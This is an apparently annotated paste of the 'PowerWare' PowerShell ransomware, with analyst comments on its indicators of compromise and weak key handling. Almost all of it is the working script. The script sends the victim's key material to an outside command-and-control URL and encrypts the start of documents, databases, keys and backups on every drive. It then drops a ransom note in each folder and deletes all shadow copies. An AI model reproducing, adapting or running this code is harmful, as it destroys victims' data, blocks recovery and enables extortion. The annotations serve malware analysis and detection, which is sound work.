Demonslay335

PowerWare Ransomware

Jul 18th, 2017
  # Annotated PowerShell ransomware sample ("PowerWare", posted 2017-07-18).
  # Analyst notes only; the code is left exactly as pasted. Cmdlet and method
  # names use randomised letter case as a simple obfuscation of the script
  # text (PowerShell is case-insensitive, so it does not change behaviour).
  #
  # Flow: infection marker -> generate key material -> POST it to the C2 over
  # plain HTTP -> two-minute sleep -> AES-encrypt the first 4 KiB of matching
  # files on every drive -> drop an HTML ransom note per directory -> delete
  # all Volume Shadow Copies.
  #
  # Infection marker: if this registry key already exists the script exits, so
  # it runs once per user. HKCU:\Software\ENCRDEC\Scripts with a "Version"
  # DWORD of 0 is a host-based indicator of compromise.
  1. $ScriptsPath = "HKCU:\Software\ENCRDEC\Scripts"
  2. $VersionString = "Version"
  3. if((Test-Path $ScriptsPath) -eq $true)
  4. {exit}
  5. else
  6. {
  7. New-Item -Path $ScriptsPath -Force | Out-Null
  8. New-ItemProperty -Path $ScriptsPath -Name $VersionString -Value "0" `
  9. -PropertyType DWORD -Force | Out-Null}
  # Per-victim key material drawn from [0-9A-Za-z] with Get-Random: a 49-char
  # password, a 19-char salt and a 24-char victim ID (shown in the ransom note).
  10. $Password = ([chaR[]](geT-RAnDOM -inpUT $(48..57 + 65..90 + 97..122) -CoUnT 49)) -jOIN ""
  11. $Salt = ([Char[]](geT-raNDOm -iNPut $(48..57 + 65..90 + 97..122) -coUNt 19)) -Join ""
  12. $VictimID = ([cHaR[]](geT-RanDom -INPut $(48..57 + 65..90 + 97..122) -COuNt 24)) -join ""
  # Key exfiltration: password, salt and victim ID are sent unencrypted in an
  # HTTP POST (synchronous, MSXML2.XMLHTTP COM object). The C2 URL is a network
  # IoC, and a captured request (proxy log, pcap) contains everything needed to
  # rebuild the AES key derived below. $post is never assigned anywhere in this
  # script, so the Content-Length header does not describe the real body ($Params).
  13. $C2 = "http://joelosteel.gdn/pi.php"
  14. $Params = "string=$Password&string2=$Salt&uuid=$VictimID"
  15. $XMLHTTP = nEw-OBjECT -coMOBJeCT MSxMl2.Xmlhttp
  16. $XMLHTTP.oPen('PoST', $C2, $faLse)
  17. $XMLHTTP.sEtRequestHeader("c"+"oNTENt-TYPE","AppLIcatIoN/X-wwW-fOrM-URL"+"EnCOdeD")
  18. $XMLHTTP.setReQuestHeaDer("c"+"ontENT-LengTH", $post.length)
  19. $XMLHTTP.SetRequeStHeader("cONneCtiOn", "clOSe")
  20. $XMLHTTP.SeNd($Params)
  # Two-minute pause between key exfiltration and encryption; the purpose is
  # not evident from the code (it does outlast short automated sandbox runs).
  21. Start-Sleep -Seconds 120
  # AES-256-CBC setup. The $FileBytes assigned here is unused (it is
  # reassigned per file below). Key = PBKDF2 (Rfc2898DeriveBytes) over the
  # password with the UTF-8 salt, only 5 iterations, 32 bytes. IV = first
  # 16 bytes of SHA1("alle"), i.e. a constant shared by every file and every
  # victim. Zero padding means the original length of a short file cannot be
  # recovered from the ciphertext alone.
  22. [BytE[]]$FileBytes=[SysTem.tExt.EnCODInG]::UniCode.GetBYtes($Password)
  23. $SaltBytes = [Text.Encoding]::UTF8.GetBytes($Salt)
  24. $AES = new-ObjeCt System.SecuRity.Cryptography.RijndaelMaNaged
  25. $AES.Key = (new-Object Security.CryPtography.RFc2898DeriveBytes $Password, $SaltBytes, 5).GetBytes(32)
  26. $AES.IV = (neW-Object Security.Cryptography.ShA1Managed).ComputeHash([Text.Encoding]::UTF8.GetBytes("alle") )[0..15]
  27. $AES.Padding="ZeRos"
  28. $AES.Mode="CBC"
  # Target every PSDrive (gdr = Get-PSDrive) that reports a non-zero Free
  # value, sorted descending (no sort key given; default object ordering).
  29. $Directory= gDr|where {$_.Free}|Sort-Object -Descending
  # Recursively enumerate files matching this extension list under each drive
  # root (gci = Get-ChildItem) and process them one at a time (% =
  # ForEach-Object). The list covers documents, media, source code, databases,
  # VM disks, backups, certificates and private keys.
  30. foreach($bGgxjhxRfshdjcTghajsichGhshjdj in $Directory){
  31. gci $bGgxjhxRfshdjcTghajsichGhshjdj.root -RecursE -InClude "*.yuv","*.ycbcra","*.xis","*.x3f","*.x11","*.wpd","*.tex","*.sxg","*.stx","*.st8","*.st5","*.srw","*.srf","*.sr2","*.sqlitedb","*.sqlite3","*.sqlite","*.sdf","*.sda","*.sd0","*.s3db","*.rwz","*.rwl","*.rdb","*.rat","*.raf","*.qby","*.qbx","*.qbw","*.qbr","*.qba","*.py","*.psafe3","*.plc","*.plus_muhd","*.pdd","*.p7c","*.p7b","*.oth","*.orf","*.odm","*.odf","*.nyf","*.nxl","*.nx2","*.nwb","*.ns4","*.ns3","*.ns2","*.nrw","*.nop","*.nk2","*.nef","*.ndd","*.myd","*.mrw","*.moneywell","*.mny","*.mmw","*.mfw","*.mef","*.mdc","*.lua","*.kpdx","*.kdc","*.kdbx","*.kc2","*.jpe","*.incpas","*.iiq","*.ibz","*.ibank","*.hbk","*.gry","*.grey","*.gray","*.fhd","*.fh","*.ffd","*.exf","*.erf","*.erbsql","*.eml","*.dxg","*.drf","*.dng","*.dgc","*.des","*.der","*.ddrw","*.ddoc","*.dcs","*.dc2","*.db_journal","*.csl","*.csh","*.crw","*.craw","*.cib","*.ce2","*.ce1","*.cdrw","*.cdr6","*.cdr5","*.cdr4","*.cdr3","*.bpw","*.bgt","*.bdb","*.bay","*.bank","*.backupdb","*.backup","*.back","*.awg","*.apj","*.ait","*.agdl","*.ads","*.adb","*.acr","*.ach","*.accdt","*.accdr","*.accde","*.ab4","*.3pr","*.3fr","*.vmxf","*.vmsd","*.vhdx","*.vhd","*.vbox","*.stm","*.st7","*.rvt","*.qcow","*.qed","*.pif","*.pdb","*.pab","*.ost","*.ogg","*.nvram","*.ndf","*.m4p","*.m2ts","*.log","*.hpp","*.hdd","*.groups","*.flvv","*.edb","*.dit","*.dat","*.cmt","*.bin","*.aiff","*.xlk","*.wad","*.tlg","*.st6","*.st4","*.say","*.sas7bdat","*.qbm","*.qbb","*.ptx","*.pfx","*.pef","*.pat","*.oil","*.odc","*.nsh","*.nsg","*.nsf","*.nsd","*.nd","*.mos","*.indd","*.iif","*.fpx","*.fff","*.fdb","*.dtd","*.design","*.ddd","*.dcr","*.dac","*.cr2","*.cdx","*.cdf","*.blend","*.bkp","*.al","*.adp","*.act","*.xlr","*.xlam","*.xla","*.wps","*.tga","*.rw2","*.r3d","*.pspimage","*.ps","*.pct","*.pcd","*.m4v","*.fxg","*.flac","*.eps","*.dxb","*.drw","*.dot","*.db3","*.cpi","*.cls","*.cdr","*.arw","*.ai","*.aac","*.thm","*.srt","*.save","*.safe","*.rm","*.pwm","*.pages",
"*.obj","*.mlb","*.md","*.mbx","*.lit","*.laccdb","*.kwm","*.idx","*.html","*.flf","*.dxf","*.dwg","*.dds","*.csv","*.css","*.config","*.cfg","*.cer","*.asx","*.aspx","*.aoi","*.accdb","*.7zip","*.1cd","*.xls","*.wab","*.rtf","*.prf","*.ppt","*.oab","*.msg","*.mapimail","*.jnt","*.doc","*.dbx","*.contact","*.n64","*.m4a","*.m4u","*.m3u","*.mid","*.wma","*.flv","*.3g2","*.mkv","*.3gp","*.mp4","*.mov","*.avi","*.asf","*.mpeg","*.vob","*.mpg","*.wmv","*.fla","*.swf","*.wav","*.mp3","*.qcow2","*.vdi","*.vmdk","*.vmx","*.wallet","*.upk","*.sav","*.re4","*.ltx","*.litesql","*.litemod","*.lbf","*.iwi","*.forge","*.das","*.d3dbsp","*.bsa","*.bik","*.asset","*.apk","*.gpg","*.aes","*.ARC","*.PAQ","*.tar.bz2","*.tbk","*.bak","*.tar","*.tgz","*.gz","*.7z","*.rar","*.zip","*.djv","*.djvu","*.svg","*.bmp","*.png","*.gif","*.raw","*.cgm","*.jpeg","*.jpg","*.tif","*.tiff","*.NEF","*.psd","*.cmd","*.bat","*.sh","*.class","*.jar","*.java","*.rb","*.asp","*.cs","*.brd","*.sch","*.dch","*.dip","*.pl","*.vbs","*.vb","*.js","*.asm","*.pas","*.cpp","*.php","*.ldf","*.mdf","*.ibd","*.MYI","*.MYD","*.frm","*.odb","*.dbf","*.db","*.mdb","*.sql","*.SQLITEDB","*.SQLITE3","*.011","*.010","*.009","*.008","*.007","*.006","*.005","*.004","*.003","*.002","*.001","*.pst","*.onetoc2","*.asc","*.lay6","*.lay","*.ms11","*.sldm","*.sldx","*.ppsm","*.ppsx","*.ppam","*.docb","*.mml","*.sxm","*.otg","*.odg","*.uop","*.potx","*.potm","*.pptx","*.pptm","*.std","*.sxd","*.pot","*.pps","*.sti","*.sxi","*.otp","*.odp","*.wb2","*.123","*.wks","*.wk1","*.xltx","*.xltm","*.xlsx","*.xlsm","*.xlsb","*.slk","*.xlw","*.xlt","*.xlm","*.xlc","*.dif","*.stc","*.sxc","*.ots","*.ods","*.hwp","*.602","*.dotm","*.dotx","*.docm","*.docx","*.DOT","*.3dm","*.max","*.3ds","*.xml","*.txt","*.CSV","*.uot","*.RTF","*.pdf","*.XLS","*.PPT","*.stw","*.sxw","*.ott","*.odt","*.DOC","*.pem","*.p12","*.csr","*.crt","*.key"|%{
  32. try{
  # Open the file read/write. There is no rename and no extension change, so
  # encrypted files keep their original names.
  33. $File = New-Object SyStem.IO.BinaryReader([System.IO.File]::Open($_, [System.IO.FileMode]::Open, [System.IO.FileAccess]::ReadWrite, [System.IO.FileShare]::Read),[System.Text.Encoding]::ASCII)
  # Only the first 4096 bytes (or the whole file if smaller) are read and
  # later overwritten; everything past 4 KiB is left intact, which matters
  # for recovery of large files.
  34. if ($File.BaseStream.Length -lt 4096){
  35. $SizeToEncrypt = $File.BaseStream.Length
  36. }
  37. else
  38. {
  39. $SizeToEncrypt = 4096
  40. }
  41. $FileBytes = $File.ReadByTes($SizeToEncrypt)
  42. $File.Close()
  # Encrypt the buffer with a fresh encryptor. For files shorter than 4096
  # bytes the zero padding can make the ciphertext up to 15 bytes longer than
  # the plaintext.
  43. $CryptoTransform = $AES.CreateEncRyPtor()
  44. $MemoryStream = new-Object IO.MemoryStream
  45. $CryptoStream = new-Object Security.Cryptography.CryptoStream $MemoryStream,$CryptoTransform,"Write"
  46. $CryptoStream.Write($FileBytes, 0,$FileBytes.Length)
  47. $CryptoStream.Close()
  48. $MemoryStream.Close()
  49. $CryptoTransform.Clear()
  50. $EncryptedBytes = $MemoryStream.ToArray()
  # Write the ciphertext back at offset 0. FileMode.Open does not truncate, so
  # the remainder of a large file is untouched.
  51. $EncryptedFile = New-Object System.IO.BinaryWriter([System.IO.File]::Open($_, [System.IO.FileMode]::Open, [System.IO.FileAccess]::ReadWrite, [System.IO.FileShare]::Read),[System.Text.Encoding]::ASCII)
  52. $EncryptedFile.Write($EncryptedBytes,0,$EncryptedBytes.Length)
  53. $EncryptedFile.Close()
  # Ransom note: one _README-Encrypted-Files.html per directory, created only
  # if absent, with the victim ID appended. The base64-encoded note body has
  # been removed from this copy of the paste. The filename is a file-system IoC.
  54. $RansomNotePath = $_.Directory.ToString() + '\_README-Encrypted-Files.html'
  55. $RansomNoteContents = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("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"));
  56. if(!(Test-path($RansomNotePath))){
  57. New-IteM -Path $RansomNotePath -ItemTyPe file -Value $RansomNoteContents
  58. AdD-Content -PAth $RansomNotePath -VaLue ("<p><font face'monospace'><h1>!!! Your Personal identification ID: $VictimID</p></font></h1>")
  59. }}
  # Empty catch: any per-file failure (locked file, access denied, etc.) is
  # silently skipped and the loop moves on to the next file.
  60. catch
  61. {
  62.  
  63. }
  64. }}
  # Remove the built-in recovery path by deleting every Volume Shadow Copy via
  # WMI (Win32_ShadowCopy.Delete). Shadow-copy deletion from a PowerShell
  # process is a high-value detection point for ransomware behaviour.
  65. $ShadowCopies = Get-WmiObjEct Win32_ShadoWCopy
  66. ForEach($ShadowCopy in $ShadowCopies) {
  67. $ShadowCopy.Delete()
  68. }
  69. exit